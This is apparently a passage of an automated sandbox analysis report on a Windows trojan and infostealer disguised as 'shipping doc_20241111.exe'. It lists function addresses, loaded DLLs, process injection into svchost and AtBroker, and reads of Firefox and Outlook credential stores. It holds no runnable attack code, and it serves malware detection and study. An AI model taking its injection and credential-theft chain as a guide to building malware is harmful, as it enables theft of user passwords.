Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04650100	3_2_04650100
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046FA118	3_2_046FA118
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_047181CC	3_2_047181CC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_047141A2	3_2_047141A2
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_047201AA	3_2_047201AA
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04700274	3_2_04700274
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046E02C0	3_2_046E02C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0471A352	3_2_0471A352
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_047203E6	3_2_047203E6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0466E3F0	3_2_0466E3F0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04660C00	3_2_04660C00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04650CF2	3_2_04650CF2
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04700CB5	3_2_04700CB5
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0466AD00	3_2_0466AD00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046FCD1F	3_2_046FCD1F
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0465ADE0	3_2_0465ADE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04678DBF	3_2_04678DBF
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04660E59	3_2_04660E59
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0471EE26	3_2_0471EE26
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0471EEDB	3_2_0471EEDB
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0471CE93	3_2_0471CE93
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04672E90	3_2_04672E90
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046D4F40	3_2_046D4F40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04702F30	3_2_04702F30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046A2F28	3_2_046A2F28
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04680F30	3_2_04680F30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04652FC8	3_2_04652FC8
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046DEFA0	3_2_046DEFA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04662840	3_2_04662840
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0466A840	3_2_0466A840
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0468E8F0	3_2_0468E8F0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046468B8	3_2_046468B8
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04676962	3_2_04676962
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046629A0	3_2_046629A0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0472A9A6	3_2_0472A9A6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0465EA80	3_2_0465EA80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0471AB40	3_2_0471AB40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04716BD7	3_2_04716BD7
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04651460	3_2_04651460
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0471F43F	3_2_0471F43F
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04717571	3_2_04717571
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_047295C3	3_2_047295C3
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046FD5B0	3_2_046FD5B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046A5630	3_2_046A5630
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_047116CC	3_2_047116CC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0471F7B0	3_2_0471F7B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0471F0E0	3_2_0471F0E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_047170E9	3_2_047170E9
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046670C0	3_2_046670C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0470F0CC	3_2_0470F0CC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0469516C	3_2_0469516C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0464F172	3_2_0464F172
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0472B16B	3_2_0472B16B
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0466B1B0	3_2_0466B1B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0467D2F0	3_2_0467D2F0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_047012ED	3_2_047012ED
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0467B2C0	3_2_0467B2C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046652A0	3_2_046652A0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0464D34C	3_2_0464D34C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0471132D	3_2_0471132D
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046A739A	3_2_046A739A
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046D9C32	3_2_046D9C32
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0471FCF2	3_2_0471FCF2
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04717D73	3_2_04717D73
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04663D40	3_2_04663D40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04711D5A	3_2_04711D5A
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0467FDC0	3_2_0467FDC0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04669EB0	3_2_04669EB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0471FF09	3_2_0471FF09
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04623FD2	3_2_04623FD2
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04623FD5	3_2_04623FD5
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0471FFB1	3_2_0471FFB1
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04661F92	3_2_04661F92
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046CD800	3_2_046CD800
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046638E0	3_2_046638E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04669950	3_2_04669950
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0467B950	3_2_0467B950
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046F5910	3_2_046F5910
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046D3A6C	3_2_046D3A6C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04717A46	3_2_04717A46
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0471FA49	3_2_0471FA49
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0470DAC6	3_2_0470DAC6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046FDAAC	3_2_046FDAAC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046A5AA0	3_2_046A5AA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04701AA3	3_2_04701AA3
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0471FB76	3_2_0471FB76
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0469DBF9	3_2_0469DBF9
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046D5BF0	3_2_046D5BF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0467FB80	3_2_0467FB80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_004B1FA0	3_2_004B1FA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_004ACEB0	3_2_004ACEB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_004AD0D0	3_2_004AD0D0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_004AB150	3_2_004AB150
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_004B55F0	3_2_004B55F0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_004B3840	3_2_004B3840
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_004CBCE0	3_2_004CBCE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0452E493	3_2_0452E493
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04520281	3_2_04520281
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0452E377	3_2_0452E377
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0452E82C	3_2_0452E82C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0452D8F8	3_2_0452D8F8
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0452CB98	3_2_0452CB98

Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 0464B970 appears 262 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 04695130 appears 58 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 046A7E54 appears 107 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 046DF290 appears 103 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 046CEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03187E54 appears 107 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0312B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03175130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 031BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 031AEA12 appears 86 times
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: String function: 00F43536 appears 31 times
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: String function: 00F648F3 appears 49 times
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: String function: 00F4B606 appears 31 times
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: String function: 00F609B0 appears 46 times

Source: shipping doc_20241111.exe, 00000000.00000003.1662666458.0000000003A83000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs shipping doc_20241111.exe
Source: shipping doc_20241111.exe, 00000000.00000003.1662436855.0000000003C2D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs shipping doc_20241111.exe

Source: shipping doc_20241111.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@17/13

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00FB36D3 GetLastError,FormatMessageW,

0_2_00FB36D3

Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FA1003 AdjustTokenPrivileges,CloseHandle,		0_2_00FA1003
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FA1607 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00FA1607

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00FB50EB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00FB50EB

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00FCA5A3 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00FCA5A3

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00FB63AC _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_00FB63AC

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00F46122 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00F46122

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

File created: C:\Users\user\AppData\Local\Temp\spiketop

Jump to behavior

Source: shipping doc_20241111.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: AtBroker.exe, 00000003.00000003.1953010501.0000000002A92000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4108398193.0000000002A92000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: shipping doc_20241111.exe	ReversingLabs: Detection: 50%
Source: shipping doc_20241111.exe	Virustotal: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\shipping doc_20241111.exe "C:\Users\user\Desktop\shipping doc_20241111.exe"
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping doc_20241111.exe"
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
Source: C:\Windows\SysWOW64\AtBroker.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping doc_20241111.exe"	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\AtBroker.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\AtBroker.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: shipping doc_20241111.exe

Static file information: File size 1601024 > 1048576

Source: shipping doc_20241111.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: shipping doc_20241111.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: shipping doc_20241111.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: shipping doc_20241111.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: shipping doc_20241111.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: shipping doc_20241111.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: shipping doc_20241111.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DvhYoKnukykMD.exe, 00000002.00000000.1688135093.00000000007EE000.00000002.00000001.01000000.00000004.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4108006746.00000000007EE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: ATBroker.pdb source: svchost.exe, 00000001.00000003.1733401086.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1733473220.0000000002A2B000.00000004.00000020.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000002.00000003.1707007902.0000000000AF4000.00000004.00000020.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000002.00000002.4108664369.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: shipping doc_20241111.exe, 00000000.00000003.1662994380.0000000003960000.00000004.00001000.00020000.00000000.sdmp, shipping doc_20241111.exe, 00000000.00000003.1662770581.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1669582986.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1765520367.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1674699687.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1765520367.000000000329E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4109445995.00000000047BE000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1774797181.0000000004477000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1773026298.00000000042AD000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4109445995.0000000004620000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: shipping doc_20241111.exe, 00000000.00000003.1662994380.0000000003960000.00000004.00001000.00020000.00000000.sdmp, shipping doc_20241111.exe, 00000000.00000003.1662770581.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1669582986.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1765520367.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1674699687.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1765520367.000000000329E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, AtBroker.exe, 00000003.00000002.4109445995.00000000047BE000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1774797181.0000000004477000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1773026298.00000000042AD000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4109445995.0000000004620000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: AtBroker.exe, 00000003.00000002.4110035048.0000000004C4C000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4108398193.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000346C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2067710841.0000000018E7C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: ATBroker.pdbGCTL source: svchost.exe, 00000001.00000003.1733401086.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1733473220.0000000002A2B000.00000004.00000020.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000002.00000003.1707007902.0000000000AF4000.00000004.00000020.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000002.00000002.4108664369.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: AtBroker.exe, 00000003.00000002.4110035048.0000000004C4C000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4108398193.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000346C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2067710841.0000000018E7C000.00000004.80000000.00040000.00000000.sdmp

Source: shipping doc_20241111.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: shipping doc_20241111.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: shipping doc_20241111.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: shipping doc_20241111.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: shipping doc_20241111.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00F4615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00F4615E

Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F609F6 push ecx; ret	0_2_00F60A09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02541AAD push 5BDF9A96h; iretd	1_2_02541ACA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02543390 push eax; ret	1_2_02543392
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02542099 push esp; ret	1_2_0254209A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0255277B push edi; iretd	1_2_0255278D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02544C75 push cs; iretd	1_2_02544C8B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0254847B push cs; retf	1_2_0254847E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02544D15 pushad ; ret	1_2_02544D16
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0256D533 pushfd ; retf	1_2_0256D552
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02544DBA push 6B6FB766h; ret	1_2_02544DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310225F pushad ; ret	1_2_031027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031027FA pushad ; ret	1_2_031027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031309AD push ecx; mov dword ptr [esp], ecx	1_2_031309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310283D push eax; iretd	1_2_03102858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310135E push eax; iretd	1_2_03101369
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Code function: 2_2_028AF178 push edi; iretd	2_2_028AF18A
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Code function: 2_2_028AE651 push ecx; ret	2_2_028AE794
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Code function: 2_2_028A4E78 push cs; retf	2_2_028A4E7B
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Code function: 2_2_028A1672 push cs; iretd	2_2_028A1688
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Code function: 2_2_028AE799 push ecx; ret	2_2_028AE794
